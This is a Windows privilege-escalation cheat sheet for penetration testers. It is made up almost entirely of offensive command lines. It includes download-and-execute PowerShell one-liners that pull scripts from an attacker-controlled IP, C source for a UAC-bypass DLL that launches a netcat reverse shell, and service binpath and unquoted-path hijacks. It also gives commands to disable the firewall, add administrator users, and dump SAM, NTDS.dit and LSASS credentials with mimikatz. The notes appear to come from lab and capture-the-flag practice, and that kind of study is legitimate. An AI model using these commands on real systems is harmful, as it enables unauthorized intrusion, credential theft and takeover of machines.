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Windows PrivEsc

Manual PrivEsc:

  • Use rlwrap on shell to enable arrow usage (up and down to navigate previous commands, left and right to navigate text)
  • Check user groups and privileges
    • whoami
    • whoami /all
    • whoami /priv
    • whoami /groups
    • net user <username>
      • Get info about a specific user
  • Kernel exploit
    • Google the last installed "hotfix + exploit"
    • Sherlock - predecessor to Watson
    • Watson
    • wes-ng
  • Check folders
    • Look for interesting files
    • C:\Users\*
    • C:\Program Files\
    • C:\Program Files (x86)\
  • Check for credentials
    • Autologin
      • get-item -path "HKLM:\software\microsoft\windows nt\currentversion\winlogon"
      • reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
    • Group Policy (GPP) passwords
    • C:\Windows\Panther\unattend.xml
  • Cached credentials
  • If credentials are cached then we can find the cleartext password using mimikatz
    • HTB: Access
    Check for cached credentials cmdkey /list
    Run command under context of a cached credential runas /user:<user> /savecred "<command>"
    cmdkey /list
    Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator
    runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('')"
  • Check running processes, pay attention to admin
    • tasklist /V
    • Most application exploits are the same as other misconfigurations (weak folder configurations, unquoted service paths, etc)
  • Open ports
    • netstat -an
      • Ports listening on local host
      • Ones not listed during nmap scan/firewalled
  • Installed programs/applications
    • List applications that are installed by the Windows Installer
      • wmic product get name, version, vendor
  • Insecure Services
    • AllAccess, Start
      • Change binpath
  • Startup Apps/autorun
    • Important if we can reboot the box
  • Privilege Abuse
    • SeLoadDriverPrivilege
    • SeImpersonatePrivilege
    • SeImpersonatePrivilege
    • SeAssignPrimaryPrivilege
    • SeTcbPrivilege
    • SeBackupPrivilege
    • SeRestorePrivilege
    • SeCreateTokenPrivilege
    • SeLoadDriverPrivilege
    • SeTakeOwnershipPrivilege
    • SeDebugPrivilege

    • Article on exploiting privileges:
  • Always Install Elevated
    • HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
      • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
      • reg query HKLM\software\policies\microsoft\windows\installer /v alwaysinstallelevated
    • Create msi reverse shell and execute it
      • msiexec /qn /i shell.msi
  • Abuse GUI Program running as admin
    • Inside application open file: file://c:/windows/system32/cmd.exe
      • Might get admin command prompt
  • Look for exploits for 3rd party drivers
    • Enumerate drivers
      • driverquery /v
      • Powershell - driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object‘DisplayName’, ‘Start Mode’, Path
    • Enumerate Driver Versions
      • Powershell - Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
  • Search the registry for keys and values that contain "password":
    • reg query HKLM /f password /t REG_SZ /s
    • reg query HKCU /f password /t REG_SZ /s
    • reg query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
    • reg query "HKCU\software\simontatham\putty\sessions" /s
    • reg query HKLM\System\ControlSet001\Control\CurrentPass
    • reg query HKLM\System\ControlSet002\Control\CurrentPass
    • HKLM\System\CurrentControlSet\Control\CurrentPass
  • Scheduled Tasks
    • schtasks /query /fo LIST /v
  • mysql
    • run commands as mysql user
      • raptor_winudf
    • Search for creds
  • Login or run commands as other user using credentials or hashes
    • Powershell
    • psexec
    • winrm
    • wmiexec
    • pth-winexe
  • Active Directory attacks
    • ASREPRoast
      • If there are users without kerberos pre-auth required.
    • Kerberoast
      • If able to authenticate as a user.

    PrivEsc Tools

  • Powerup.ps1
    • IEX(New-Object Net.WebClient).downloadString('http://<ip address>/PowerUp.ps1')
    • Invoke-AllChecks
  • Winpeas
  • Seatbelt
  • Windows-Privesc-Checker
  • Windows Exploit Suggester - Next Generation
    • /systeminfo.txt -i 'Elevation of Privilege' --exploits-only
  • Metasploit
  • Bloodhound
    • Use against DC
    • Clone repo for most up-to-date version
    • Usage instructions:
      • Start neo4j on Kali
        • run: neo4j console
          • Default credentials - neo4j:neo4j
      • Run collector/ingestor on victim AD DC machine
        • Locally with .\Sharphound.exe -c all
        • Remotely using python: sudo python3 -c all -u <user> -p '<password>' -ns <ip> -d <domain name> --zip
      • Start bloodhound on Kali
        • sudo ./Bloodhound --no-sandbox
      • Drag and drop file generated by sharphound into Bloodhound window
      • On top left where it says "Search for a node" enter the username that is being used on the victim machine
      • right click icon in center with pwned victim machine user and "Mark User as Owned"
      • Things to check under Queries/Analysis tab
        • Shortest Paths from Kerberoastable Users
        • Shortest path from Owned principles
        • Shortest path to High Value Targets
      • Can right click on account associations and select "Help" and it will give info how an AD association can be abused
  • SharpCollection
    • Common C# offensive tools that are checked for updates daily, and then compiled

    cmd Commands

  • Location: C:\Windows\System32\cmd.exe
  • Miscellaneous
  • Base64 encode file certutil encode <file> <output name>
    grep string from output <command> | findstr
  • System Information & Control
  • show hostname hostname
  • shutdown -r -t 10 && exit
    • && exit because an error message can pop up when initiating a restart with a shell still active.
    List system-wide updates wmic qfe get Caption, Description, HotFixID, InstalledOn
    List version and architecture systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
    List version and architecture systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
    Enumerate drivers installed driverquery /v
    View statistics net statistics
  • Applications & Services
  • List running services tasklist
    Running Processes & Services tasklist /SVC
  • User & Group Permissions
  • view current user
  • whoami
  • echo %username%
  • See all user accounts net user
    More details about specific account net user <username>
    View domain users net user /domain
    View local administrators group net localgroup Administrators
    View groups net group
    Shows all groups on the domain net group /domain
    net accounts Check accounts info (password lockout, etc)
    Add user net user <username> <password> /add
    Add user to domain net user <username> <password> /add /domain
    Change password net user <username> <password>
    View users in a group net group "<Group Name>"
    Add user to a group
  • net group <Group Name> <user> /add
  • net group <Group Name> <user> /add /domain
  • Make user a local admin net localgroup administrators <username> /add
    Give full control of file to user cacls <file> /t /e /p <user>:F
    - F = Full Control
    Remove access to file from user cacls <file> /r /e <user>
  • File System
  • Edit text document Copy con C:\file.txt
    Search for files dir <file name>
    /s List all occurrences of the file in the specified directory and subdirectories
  • Display alternate data streams of the file (files that are acting like folders and contain files inside of them)
    • If data stream files are found, display content with Powershell: (Get-Content <main file> -Stream <File inside the file>
    Find file where <file name>
    where /r C:\ <file name>
    where /R C:\ <file name>
    Mount smb share net use <drive letter>: \\<SMB Server ip>\<smb share to mount>
    List all drives that are currently mounted as well as unmounted but connected mountvol
    Analyze encrypted files cipher /c <file>
    Check file permissions cacls <file>
  • Networking
  • Disable firewall - New way netsh advfirewall set allprofiles state off
    Disable Firewall - Old way netsh firewall set opmode disable
    Disable firewall service (can only run as SYSTEM?) net stop mpssvc
    Current firewall profile netsh advfirewall show currentprofile
    Firewall rules netsh advfirewall firewall show rule name=all
    Show open ports netstat -ano
    Network Information ipconfig /all

    Powershell Commands

  • System Information & Control
  • Enumerate drivers Powershell - driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object‘DisplayName’, ‘Start Mode’, Path
    Enumerate driver versions Powershell - Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
    Check operating system architecture [environment]::Is64BitOperatingSystem
    Check powershell session architecture [environment]::Is64BitProcess
  • 64-bit powershell
    • C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe
    Check language mode (such as constrained, if being restricted by UAC) $ExecutionContext.SessionState.LanguageMode
    Environment variabels dir env:
    Get time & date Get-Date
    Powershell history C:\Users\<user>\appdata\roaming\microsoft\windows\powershell\psreadline\ConsoleHost_history.txt
    Powershell location echo $PSHOME
    See available powershell commands Get-Command
  • User & Group Permissions
  • Create Credential Variable $pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential('<Username>', $pass)
    Decrypt SecureString password to plaintext from CLI XML file. (Import-CliXml -Path user.txt).GetNetworkCredential().Password
    Query user information Get-ADUser <user> [-properties *]
    View service permissions
  • $acl = get-acl HKLM:\System\CurrentControlSet\Services
  • ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | ForEach-Object {$_.DiscretionaryAcl}
  • File System
  • Read file content Get-Content <file name>
    gc <file name>
    Sort files by last write time dir | sort LastWriteTime
    Read new lines written to file
  • Get-Content <file> -wait -tail <#>
  • Get-Content <file> -wait -tail <#> | Select-String -Pattern "<pattern>"
  • Check file/folder permissions Get-ACL <file/folder> | Fl *
    View file contents (Get-Content <file>).substring(0,16)
    Search for file Get-ChildItem -Path V:\Myfolder -Filter CopyForbuild.bat -Recurse -ErrorAction SilentlyContinue -Force
    Recursively show file names gci -recurse | select FullName
    Show only files gci -File
    Ignore errors -ErrorAction SilentlyContinue
    ErrorAction ignore
    Parse .lnk files
    $WScript = New-Object -ComObject WScript.Shell
    $SC = Get-ChildItem *.lnk
  • Network
  • View open TCP ports and running processes Get-NetTCPConnection -State Listen | Select-Object -Property *,@{'Name' = 'ProcessName';'Expression'={(Get-Process -Id $_.OwningProcess).Name}} | FT ProcessName, LocalAddress, LocalPort -autosize
  • Miscellaneous
  • Secretly run scripts powershell.exe -ExecutionPolicy Bypass –NoLogo –NonInteractive –NoProfile –File <file.ps1>
    enable colors reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
    dot-source / load all variables & functions from powershell script
  • .\<script>.ps1
  • iex (New-Object System.Net.Webclient).DownloadString('')
  • Enable RDP
    Enable RDP service Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
    Set firewall rules Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    Enable restricted admin RDP login New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD
    Convert SecureString to PlainText [System.Net.NetworkCredential]::new("", $SecurePassword).Password

    File Transfers

  • Download to Windows
  • Base64 Decoding powershell -e <base 64>
    Download file
  • invoke-webrequest -Uri http://<ip address>/shell.exe [-OutFile <file>]
  • IWR -Uri <url> [-OutFile <file>]
  • Download file with Powershell
  • powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<ip address>/wget.exe','C:\<output directory and file name>')
  • powershell "(new-object System.Net.WebClient).DownloadFile('http://<ip address>/wget.exe','C:\<output directory and file name>')"
  • (new-object System.Net.WebClient).DownloadFile('http://<ip address>/shell.ps1',<output directory and file name>')
  • wget <url> -outfile <file name>
  • Download file with cmd certutil -urlcache -split -f http://<ip address>/<file name> C:\\<output directory and file name>
    Download and run powershell script
  • powershell -c "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')"
  • powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')"
  • IEX(IWR http://<ip address>/shell.ps1 -UseBasicParsing)
  • IEX(IWR(<url>))
  • SMB
  • Mount SMB share using powershell to new drive and using powershell credential object
  • Start SMB share on Kali
  • impacket-smbserver <Share Name> <Directory of Share> -smb2support -user <Username to connect to share> -password <Password to connect to share>
  • Some machines do not work with smb2support. Other machines require it.
  • Credentials optional. Can skip next step if not used.
  • Create SMB Share Credential Variable
  • $pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
  • $cred = New-Object System.Management.Automation.PSCredential('<Username>', $pass)
    • If it is a domain account then:
      • $cred = New-Object System.Management.Automation.PSCredential('<Domain>\<Username>', $pass)
    • Verify $cred creation by echoing it
    Connect to SMB Share From Windows
  • New-PSDrive -Name <Drive Name for SMB Share> -PSProvider FileSystem -Credential $cred -Root \\<ip of attacker>\<Share Name>
  • If accessing the same share from multiple shells on the same windows machine it works best to give them each different drive names (-Name <Name>)
  • Open SMB Share on Windows <Drive Name Assigned to SMB Share>:
  • Mount SMB share using cmd and simple credentials
  • Create SMB Share sudo impacket-smbserver <Share Name> <Share Directory> -smb2support -user <username> -password <password>
    Connect to share net use \\<ip address>\<share name> /u:<username> <password>
    net use x: \\<ip>\<share name> /u:<user> <password>
    Open share cd \\<ip address>\<share name>\
  • Create SMB share using Linux's built-in SMB server
  • Create SMB Share (optional and self-explanatory parameters included)
  • sudo vi /etc/samba/smb.conf
  • [share]
  • comment = My Share
  • browseable = yes
  • path = /srv/SMB
  • read only = no
  • guest ok = yes
  • writable = yes
  • create mask = 0777
  • Might need to give SMB permissions to share directory
  • chmod 777 <smb share directory>
  • chmod 755 <smb share directory>
  • Start Share service smbd restart
  • Troubleshoot by using smbclient and access the SMB directory on our machine and attempt to retrieve or upload files.
  • Upload to windows
  • Upload with Powershell to Web Server
  • Invoke-RestMethod -Method PUT -Uri "http://<ip address>:<port>/<file name>" -Body $variable
  • powershell (New-Object System.Net.WebClient).UploadFile('http://<ip address>/<file name>', '<file name>')
  • Upload to tftp
    • tftp is only on Windows until XP & 2003
    Setup TFTP on Kali sudo apt install atftp
    Create tftp Directory sudo mkdir /tftp
    Set owner "nobody" on tftp Directory sudo chown nobody: /tftp
    Activate tftp server on port 69 sudo atftpd --daemon --port 69 /tftp
    Upload file from Windows to Linux tftp -i <ip address> put file.txt
    Base64 Encoding
    base64 w/ powershell
  • $fc = Get-Content <file>
  • $fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
  • [System.Convert]::ToBase64String($fe)
  • Read file with Kali echo -n <base64 text> | base64 -d
    Upload with powercat
    Set listener on receiving machine nc -lvnp <port #> > receiving_file.ps1
    Send file with PowerCat powercat -c <ip address> -p <port #> -i C:\<Directory and file name>
  • Upload from Windows
  • Upload to Linux web server
    Upload server creation
    Create upload.php in /var/www/html
    $uploaddir = '/var/www/uploads/';
    $uploadfile = $uploaddir . $_FILES['file']['name'];
    move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
    Create directory to upload to
  • mkdir /var/www/uploads
  • sudo chown www-data: /var/www/uploads
  • Start web server sudo systemctl start apache2
    Upload file powershell (New-Object System.Net.WebClient).UploadFile('http://<ip address>/upload.php', '<file>')

    Startup Apps

  • Program for startup apps that should start for all users (including admin):
    • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
    • C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
      • Directory
      • if we have access, we can add a reverseShell.exe, and when admin logs in we will get a admin priv reverse shell.
    • Check access to directory with accesschk.exe:
      • accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    • files in StartUp directory must be shortcuts (.lnk)
      • VBScript to create a shortcut file:
        Set oWS = WScript.CreateObject("WScript.Shell")
        sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
        Set oLink = oWS.CreateShortcut(sLinkFile)
        oLink.TargetPath = "C:\PrivEsc\reverse.exe"
    • cmd "cscript CreateShortCut.vbs"

    Prilivege Abuse

  • SeImpersonatePrivilege
  • Rotten Potato
    • Works up until sometime in 2019.
    • Patched on latest Windows 10.
  • Juicy Potato
    • JuicyPotato.exe -l 1337 -p <program> -t * -c <{CLSID}>
  • Rogue Potato
    • More advanced and complicated than previous potato exploits.
    • Instructions
      • Listener on Kali: sudo socat tcp-listen:135,reuseaddr,fork tcp:<Victim ip address>:9999
      • On victim Windows machine: RoguePotato.exe -r -l 9999 -e "C:\windows\system32\cmd.exe"
  • PrintSpoofer
    • Targets print spooler service
    • Does not require any port forwarding like potato exploits.
    • The entire exploit runs on the target machine.
    • Requires C++ redistributable is installed.
    • PrintSpoofer.exe -i -c "C:\reverse\shell.exe"
  • SeAssignPrimaryTokenPrivilege
    • Potato Exploits (SeImpersonatePrivilege)
  • SeLoadDriverPrivilege
    • Download these files:
      • Capcom.sys from fuzzysecurity
        • eoploaddriver.cpp
      • Exploitcapcom from github
    • Compile EoPLoadDriver in visual studio
      • Create a new project
        • Console app
        • Name it LoadDriver
      • Open LoadDriver.cpp
        • Replace all contents with contents from eoploaddriver.cpp
      • Select "Release" and "x64"
      • Build --> Rebuild Solution. LoadDriver.exe should be created.
    • Compile ExploitCapCom
      • File --> Open -- Project/Solution
        • Select Exploit Capcom
        • Set "Release" and "x64"
        • Rebuild solution
        • ExploitCapCom.exe should be created
    • Transfer ExploitCapCom.exe, LoadDriver.exe, and capcom.sys to victim machine
      • LoadDriver.exe System\CurrentControlSet\MyService C:\<path to capcom.sys>
      • .\ExploitCapCom.exe
      • Should have system shell.
  • SeBackupPrivilege
    • Grants read access to all objects on the system regardless of ACL
      • Read sensitive files
      • Extract hashes
        • Pass-the-hash
        • Crack them
    • Backup ntds file to SMB server
    • Create NTFS share on attacker
      Create 2gb NTFS folder called ntfs.disk dd if=/dev/zero of=ntfs.disk bs=1024M count=2
      Create loopback setup sudo losetup -fP ntfs.disk
      Check losetup losetup -a
      Create NTFS disk sudo mkfs.ntfs /dev/loop0
      Mount NTFS disk to a folder sudo mount /dev/loop0 ./smb
      Edit SMB to setup SMB share
    • sudo vi /etc/samba/smb.conf
      comment = <anything>
      browseable = yes
      path = <local path to SMB share>
      read only = no
      guest = yes
      Start smb share sudo systemctl restart smbd
      Backup ntds file from victim echo y | wbadmin start backup -backuptarget:\\<ip address>\share -include:C:\windows\ntds\
      extract contents of .vhdx on victim (using attacker SMB share)
    • echo y | wbadmin start recovery -version:<version> -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
    • Get version
      • victim: "wbadmin get versions"
        • Version identified:<version>
    • ntds.dit should be in C:\
  • SeRestorePrivilege
    • Grants write access to all objects on the system regardless of ACL
    • Modify service binaries
    • Overwrite DLLs used by SYSTEM processes
    • Modify registry settings
  • SeTakeOwnershipPrivilege
    • Lets the owner take ownership over an object
    • Same as SeRestorePrivilege after taking ownership of files
  • More reading on token abuse:

  • Always Install Elevated

  • Check if enabled
    • HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
      • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
      • reg query HKLM\software\policies\microsoft\windows\installer /v alwaysinstallelevated
    • Create msi reverse shell and execute it
      • msiexec /qn /i shell.msi

    Autorun Applications

  • Enumerate Auto Run Programs
    • reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • check for write to file permissions
      • accesschk.exe /accepteula -quvw <user> <service>

    Insecure File Permissions

  • Look for files of any type that can help break into the system. Scripts with hardcoded credentials, other sensitive files, etc.
  • Search for world writable files:
    • Accesschk.exe -uws "Everyone" "C:\Program Files"
    • Powershell.exe "Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}"
  • Configuration Files
    • Look for files like Unattend.xml which might contain credentials
    • Search for files with pass in the name or ending in .config
      • dir /s *pass* == *.config
  • Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt:
    • findstr /si password *.xml *.ini *.txt

    Insecure Services

  • Manually enumerate insecure services
  • View user service permissions
  • $acl = get-acl HKLM:\System\CurrentControlSet\Services
  • ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | ForEach-Object {$_.DiscretionaryAcl}
  • List services gci HKLM:\SYSTEM\CurrentControlSet\Services
    List started services cmd.exe /c wmic service where started=true get name, startname
  • List services:
    • Running as: SYSTEM
    • Start/stop type: manual
    Create list of all services $services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*
    Show all services owened by SYSTEM and start type is manual $services | where { ($_.ObjectName -match 'LocalSystem') -and ($_.Start -match '3') }
    Get list of services with only name, no details $names = $services.pschildname
    List all services owened by SYSTEM, start type manual, and we have permission to start $canStart = Foreach ($service in $names) { $sddl = (cmd /c sc sdshow $service); if ($sddl -match "RP[A-Z]*?;;;AU") { $service }}
    List permissions for a service
  • sc.exe sdshow <service>
  • ConvertFrom-SDDLString -Sddl "<output from sc.exe sdshow <service>>" | ForEach-Object {$_.DiscretionaryAcl}
  • How to read the permissions:
  • Tools
    • winPEAS
    • Check for service vulnerabilities winPEASany.exe quiet servicesinfo
    • sc.exe
    • Start/Stop a service sc.exe start/stop <service name>
      Query the configuration of a service sc.exe qc <name>
      Query the current status of a service sc.exe query <name>
      Modify a configuration option of a service sc.exe config <name> <option>= <value>
      Change service start type sc config <Service Name> start= auto
      Change binary path sc config <name> binpath= "\"C:\path\to\reverse_shell\""
    • accesschk.exe
    • Check for services we have rights/privileges to accesschk.exe /accepteula -uwcqv "Authenticated Users" *
      More details on user groups rights/privileges to a service accesschk.exe /accepteula -ucqv <Service Name>
      verify user permissions to a service accesschk.exe /accepteula -ucqv <username> <service>
      Check for permissions to write in a directory accesschk.exe /accepteula -uwdq C:\directory
      Check for access to insecure executables accesschk.exe /accepteula -quvw <Executable>
    • net
    • Start/Stop a service net start/stop <name>
    • wmic
    • Check service start options wmic service where caption="<ServiceName>" get name, caption, state, startmode
      Check running services wmic service get name,displayname,pathname,startmode
      Get running services that are auto and not standard windows wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows"
    • powershell
    • List running services Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
      Start service Start-Service <service>
    • cmd
    • List running services tasklist
    • icacls
    • Check directory permissions icacls "C:\<Directory>"
      Check for access to insecure executable Icacls "<Executable>"
  • Insecure Service Properties
    • Change binary path
      • sc config <name> binpath= "\"C:\reverse_shell.exe""
      • sc.exe config usosvc binpath="cmd.exe /c powershell.exe -EncodedCommand <base64>
  • Unquoted Service Path
    • Try to raplce a path location to a reverse shell executable
      • Example
        • C:\Program Files\Unquoted Path Service\Common Files\originalservice.exe
          • windows would try to execute "Program" first, then "Unquoted", then "Common", and finally "originalservice.exe"
            • If we can create a reverse shell named "Program.exe", "Unquoted.exe", etc, we can get reverse shell
  • Weak Registry Permissions
    • INTERACTIVE group includes all users that can login locally
    Check registry permissions using PowerShell Get-Acl HKLM:\registry\directory | format-list
    Check permissions using accesschk.exe accesschk.exe /accepteula -uvwqk HKLM\registry\directory
    Check current values in registry entry
    Method 1 reg query HKLM\System\CurrentControlSet\services\<service>
    Method 2 Get-Item HKLM:\System\CurrentControlSet\Services\<service>
    Change registry value
    Method 1 reg add HKLM\service\path /v ImagePath /t REG_EXPAND_SZ /d D:\PrivEsc\shell4444.exe /f
    Method 2 Set-ItemProperty -path HKLM:\System\CurrentControlSet\Services\<service> -Name ImagePath -Value "<executable>"
  • Insecure Service Executables
    • If able, replace original service executable with our own.
    Check for access with accesschk.exe accesschk.exe /accepteula -quvw "C:\<executable>"
    Check access with icacls Icacls "C:\<executable>"
  • DLL Hijacking
    • Enumerate non-windows services to see which one we are able to start/stop
    • Analyze the service executable using procmon and implement a malicious .dll file:
      • Download executable
      • Open procmon
      • Stop and clear capture
      • Push ctrl + L - drop down menu for "Process Name" - enter process name - push add & OK
      • Deselect "show registry activity" & "show network activity"
      • Start capture
      • Look for dll's that are attempted to be executed but do not exist. Put a reverse shell .dll in that directory
    • Start the vulnerable service

    Scheduled Tasks

  • Tasks run at time intervals or by events (log-on, etc)
  • Tasks run with privileges of user who created them.
    • Administrator can set tasks to run as other users.
  • List all scheduled tasks your user can see:
    • Schtasks /query /fo LIST /v
    • Get-ScheduledTask| where {$_.TaskPath-notlike"\Microsoft*"} | ft TaskName,TaskPath,State
  • Usually need to look for tasks based on other clues like finding a script or log file that shows a scheduled task is being run.
  • look for a script running on a schedule and modify it with some malicious action. Look into interesting directories.

  • Bypass UAC

  • UAC Bypass requires administrator account
    • UAC bypass required if shell is giving adiministrator access denied
  • Requires an interactive shell
    • ncat does not work.
    • Use a metasploit shell and attach to explorer or another process with a 1 (for interactive) in the 'ps' list (seen after getting a metasploit shell).
  • Typically required for applications to launch a gui
  • UAC bypasses
    • net use x: \\\c$
  • Helpful post on understanding UAC settings
  • UAC Bypass dll
  • #include <windows.h>
    BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
                    case DLL_PROCESS_ATTACH:
                            WinExec("C:\\Users\\batman\\nc.exe 7777 -e powershell", 0);
                    case DLL_PROCESS_DETACH:
                    case DLL_THREAD_ATTACH:
                    case DLL_THREAD_DETACH:
            return 0;
    /* i686-w64-mingw32-g++ main.c -lws2_32 -o srrstr.dll -shared */
  • Check if UAC is on
    • reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
      • EnableLUA
        • 0 = UAC enabled, no bypass needed, can PsExec to SYSTEM
        • 1 = UAC disabled, need to check the other 2 keys
      • ConsentPromptBehaviorAdmin
        • Can take on 6 different values
      • PromptOnSecureDesktop
        • Either 1 or 0
      • If ConsentPromptBehaviorAdmin=2 & PromptOnSecureDesktop=1 then UAC bypass will not work
      • If ConsentPromptBehaviorAdmin=5 & PromptOnSecureDesktop=1 then UAC bypass will work
  • ConsentPromptBehaviorAdmin Values:
  • Value Meaning
    0x00000000 This option allows the Consent Admin to perform an operation that requires elevation without consent or credentials.
    0x00000001 This option prompts the Consent Admin to enter his or her user name and password (or another valid admin) when an operation requires elevation of privilege. This operation occurs on the secure desktop.
    0x00000002 This option prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task. This operation occurs on the secure desktop.
    0x00000003 This option prompts the Consent Admin to enter his or her user name and password (or that of another valid admin) when an operation requires elevation of privilege.
    0x00000004 This prompts the administrator in Admin Approval Mode to select either "Permit" or "Deny" an operation that requires elevation of privilege. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. "Prompt for consent" removes the inconvenience of requiring that users enter their name and password to perform a privileged task.
    0x00000005 This option is the default. It is used to prompt the administrator in Admin Approval Mode to select either "Permit" or "Deny" for an operation that requires elevation of privilege for any non-Windows binaries. If the Consent Admin selects Permit, the operation will continue with the highest available privilege. This operation will happen on the secure desktop.
  • Eventvwr.exe UAC bypass:
    • Works on Windows 7, 8, and 10. Does not work on Vista
    • Guide:
    • Exploit in C (requires minimal editing) -
  • Pre-made UAC bypass executables on Kali
    • bypassuac-x86.exe & bypassuac-x64.exe
    • Same limitations as eventvwr.exe UAC bypass
    • bypassuac-x**.exe /c C:\directory\to\shell4444.exe

    Finding Logged in Users

  • Enumerate Logged on Users
    • Individual Workstation
      • NetWkstaUserEnum
        • Requires admin privileges
      • Powerview.ps1
        • Get-NetLoggedon –ComputerName <workstation name>
    • Domain Enumeration
      • NetSessionEnum
        • Enumerate active sessions on domain joined machines
        • Does not require admin privileges
        • Use against file servers and domain controllers
        • Powerview.ps1
          • Get-NetSession
            • Get-NetSession –ComputerName <domain controller or server – ex. dc01>

    Cached Credentials

    Check for cached credentials cmdkey /list
    Run command under context of a cached credential runas /user:<user> /savecred "<command>"
    cmdkey /list
    Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator
    runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('')"
  • If credentials are cached then we can find the cleartext password using mimikatz
  • Master key
  • Location - C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>
    • <SID> - Users security identifier
    • <GUID> - Name of master key
  • A user can have multiple master keys
  • Master key can be decrypted using user's password or domain backup key
  • A decrypted master key can be used to decrypt any DPAPI data blobs
  • Decrpyt using mimikatz dpapi::masterkey /in:<master key file> /sid:<SID> /password:<password>
    Encrypted Credential Manager Credentials
  • User credential Locations
    • C:\Users\<USER>\AppData\Local\Microsoft\Credentials\
  • System credential location - %systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
  • mimikatz decrypt file using master key
  • # dpapi::cred /in:<credential file>
    • If ran after decrypting a master key the mimikatz will automatically apply it
  • Resources:
    • HTB: Access

    Security Identifier (SID)

  • Every account has one.
    • There is a separate one for each account that is used for elevated privileges (UAC)
  • Windows refers to accounts by SIDs, people refer to accounts by account names
  • All SIDs start with S-1-5-21
    • Admin always ends in 500
    • Guest always ends in 501
    • S-1-5-19 is the LocalSystem account
  • Example SID: S-1-5-21-1180699209-877415012-3182924384-1004
  • S 1 5 21-1180699209-877415012-3182924384 1004
    Indicates this is a SID SID specification version number Identifier authority Domain or local computer identifier Relative ID

    Dump Proccess

  • .\procdump64.exe -ma <PID> -accepteula
  • Mimikittenz
    • Check memory of user processes for passwords. By defalt checks IE, Chrome, and Firefox for POST requests to well known websites.

  • Dump Hashes

  • Dumped hash format
    • Username:#:LM HASH:NTLM HASH:::
  • SAM, SYSTEM, and SECURITY Location
    • C:\Windows\System32\config\
    • Backup Locations
      • C:\Windows\System32\config\RegBack
      • C:\Windows\Repair
    • reg save HKLM\<file> <Out file>
      • reg save HKLM\SAM C:\SAM
      • reg save HKLM\SECURITY C:\SECURITY
      • reg save HKLM\SYSTEM C:\SYSTEM
  • vssadmin
    • Dump ntds.dit
      • vssadmin create shadow /for=C:
      • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
      • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
  • mimikatz
    • Extracts hashes from the Local Security Authority Subsystem (LSASS)
    • Dump creds/hashes
      • Summary
        • privilege::debug
        • token::elevate
        • lsadump::sam
        • sekurlsa::logonpasswords
      • Explained/Detailed
        • Mimikatz must be launched from an administrative command prompts
          • Must first execute two commands:
            • privilege::debug – enables SeDebugPrivilege
              • If fails, mimikatz was most likely not executed with admin privileges
            • token::elevate
              • Elevates mimikatz security token from administrator to SYSTEM
